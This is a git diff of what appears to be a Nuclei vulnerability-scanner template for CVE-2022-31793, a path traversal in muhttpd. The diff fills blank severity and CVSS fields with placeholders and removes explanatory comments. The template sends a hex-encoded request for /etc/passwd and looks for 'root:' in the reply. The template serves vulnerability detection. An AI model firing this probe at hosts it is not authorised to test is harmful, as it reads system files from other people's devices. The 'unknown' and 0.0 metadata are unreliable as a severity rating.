diff --git a/cves/2022/CVE-2022-31793.yaml b/cves/2022/CVE-2022-31793.yaml index 58c17cb26f..e75dcd0571 100644 --- a/cves/2022/CVE-2022-31793.yaml +++ b/cves/2022/CVE-2022-31793.yaml @@ -3,24 +3,24 @@ id: CVE-2022-31793 info: name: muhttpd <= 1.1.5 - Path traversal author: scent2d - severity: + severity: unknown description: | A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system. reference: - https://derekabdine.com/blog/2022-arris-advisory.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793 classification: - cvss-metrics: - cvss-score: + cvss-metrics: unknown + cvss-score: 0.0 cve-id: CVE-2022-31793 - cwe-id: + cwe-id: unknown tags: cve,cve2022,muhttpd,lfi,unauthenticated network: - host: - - "{{Hostname}}" + - "{{Hostname}}" inputs: - - data: "47455420612F6574632F706173737764" # GET a/etc/passwd + - data: "47455420612F6574632F706173737764" type: hex - data: "\n\n" @@ -29,5 +29,5 @@ network: - type: word encoding: hex words: - - "726f6f743a" # root: - part: body \ No newline at end of file + - "726f6f743a" + part: body